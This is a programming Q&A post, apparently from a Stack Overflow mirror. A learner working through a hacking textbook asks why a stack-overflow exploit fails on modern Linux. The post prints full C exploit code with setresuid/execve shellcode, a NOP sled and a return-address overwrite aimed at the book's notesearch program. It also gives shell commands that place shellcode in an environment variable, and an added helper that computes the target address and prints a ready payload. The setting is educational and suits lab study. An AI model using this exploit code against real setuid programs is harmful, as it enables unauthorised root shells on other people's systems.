Why won't this shellcode execute?

I'm working through Hacking: The Art of Exploitation and am running into my first snag trying to get a known working exploit from the book to run via an environment variable. All programs were compiled with -fno-stack-protector -zexecstack -no-pie -fno-pie.

Running exploit_notesearch.c (albeit with a very specific offset), I was able to get the exploit to pop a shell by moving the offset with argv[1]. This works on modern OSes (with ASLR disabled) as well as on the LiveCD included with the book.

notesearch.c

exploit_notesearch.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h> // bzero()

// i386 Linux shellcode: setresuid(0,0,0) via int 0x80 (eax=0xa4),
// then execve("/bin//sh", ["/bin//sh"], NULL) via int 0x80 (eax=0xb)
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=208;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   // guess the target's stack address from our own stack (32-bit build)
   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); // shellcode after the sled

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
   return 0;
}

Further on in the chapter, we set the shellcode to an environment variable and attempt to redirect flow to the place on the stack where the SHELLCODE environment variable is set, halfway through the prepended NOP sled. However, this never executes the exploit on modern OSes but works just fine in the Ubuntu 7.04 live CD that came with the book. shellcode.bin is the shellcode at the top of the exploit_notesearch.c file, run through echo -en and redirected into a file.

$ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
$ ./notesearch $(perl -e 'print "\x17\xf2\xff\xbf"x40') # Address halfway through NOP sled

What is going on here that has changed between old OSes and modern ones? Is there a protection I'm unaware of that is preventing me from riding the NOP sled to the shellcode?

Thank you.

The problem was stack alignment; compiling with -mpreferred-stack-boundary=2 aligns the stack similarly to the book.
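The address in the question's `perl -e 'print "\x17\xf2\xff\xbf"x40'` line is hard-coded, which is exactly what breaks when the stack layout shifts (alignment, environment size, program-name length). The following is an added example, not code from the book or from the poster, showing how to derive that address instead: read SHELLCODE's location in a helper process, correct for the difference in program-name length (assumption: the kernel places the program name on the stack twice, so the correction is 2x the length difference), aim at the middle of the NOP sled, and check that the resulting address can survive being passed through argv (no NUL bytes). The function names are hypothetical, and the arithmetic assumes a 32-bit build (-m32) as in the book.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example; hypothetical helper names, not from the book or the post.
 * All addresses are 32-bit, matching the book's i386 environment. */

/* The environment strings sit at the top of the stack and are laid out the
 * same way for any process started with the same environment. What shifts
 * them is the program name, which (assumption) the kernel stores on the
 * stack twice, so the target's copy is offset by 2x the name-length difference. */
uint32_t target_env_addr(uint32_t addr_in_helper, const char *helper_name,
                         const char *target_name)
{
    long diff = (long)strlen(helper_name) - (long)strlen(target_name);
    return addr_in_helper + (uint32_t)(2 * diff);
}

/* Aim into the middle of the NOP sled that precedes the shellcode, as the
 * question does with its "halfway through NOP sled" address. */
uint32_t sled_midpoint(uint32_t env_addr, size_t sled_len)
{
    return env_addr + (uint32_t)(sled_len / 2);
}

/* argv strings are NUL-terminated: an address containing a 0x00 byte is
 * truncated by the C library before notesearch ever sees it. */
int addr_has_nul(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* Byte at position idx of the address repeated little-endian, i.e. the
 * string perl -e 'print "\x17\xf2\xff\xbf"x40' would produce. */
unsigned char ret_addr_byte(uint32_t addr, size_t idx)
{
    return (unsigned char)((addr >> (8 * (idx % 4))) & 0xffu);
}

/* Write count copies of addr (little-endian) into buf; returns bytes written. */
size_t fill_ret_addrs(unsigned char *buf, size_t cap, uint32_t addr, size_t count)
{
    size_t n = 0;
    for (size_t i = 0; i < count * 4 && n < cap; i++)
        buf[n++] = ret_addr_byte(addr, i);
    return n;
}

int main(int argc, char *argv[])
{
    if (argc < 3) {
        fprintf(stderr, "usage: %s <envvar> <target-program>\n", argv[0]);
        return 1;
    }
    char *p = getenv(argv[1]);
    if (!p) {
        fprintf(stderr, "%s is not set\n", argv[1]);
        return 1;
    }
    /* Assumption: built with -m32, so the pointer fits in 32 bits. */
    uint32_t here  = (uint32_t)(uintptr_t)p;
    uint32_t there = target_env_addr(here, argv[0], argv[2]);
    uint32_t ret   = sled_midpoint(there, 200); /* 200-byte sled as in the question */
    printf("%s at 0x%08x here, expected 0x%08x in %s, aiming at 0x%08x\n",
           argv[1], here, there, argv[2], ret);
    if (addr_has_nul(ret))
        fprintf(stderr, "warning: address contains a NUL byte; pick another sled offset\n");
    unsigned char payload[160];
    size_t n = fill_ret_addrs(payload, sizeof payload, ret, 40);
    for (size_t i = 0; i < n; i++)
        printf("\\x%02x", payload[i]);
    putchar('\n');
    return 0;
}
```

Run it with the same environment the target will see (`export SHELLCODE=...` first, then `./helper SHELLCODE ./notesearch`), since any change to the environment between the measurement and the real run moves the strings again. The printed `\x..` sequence is the argument to pass to notesearch, replacing the hard-coded address in the question.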

Notice: the technical posts on this site are licensed under CC BY-SA 4.0; if you republish them, please credit this site or the original URL. For any questions contact: yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM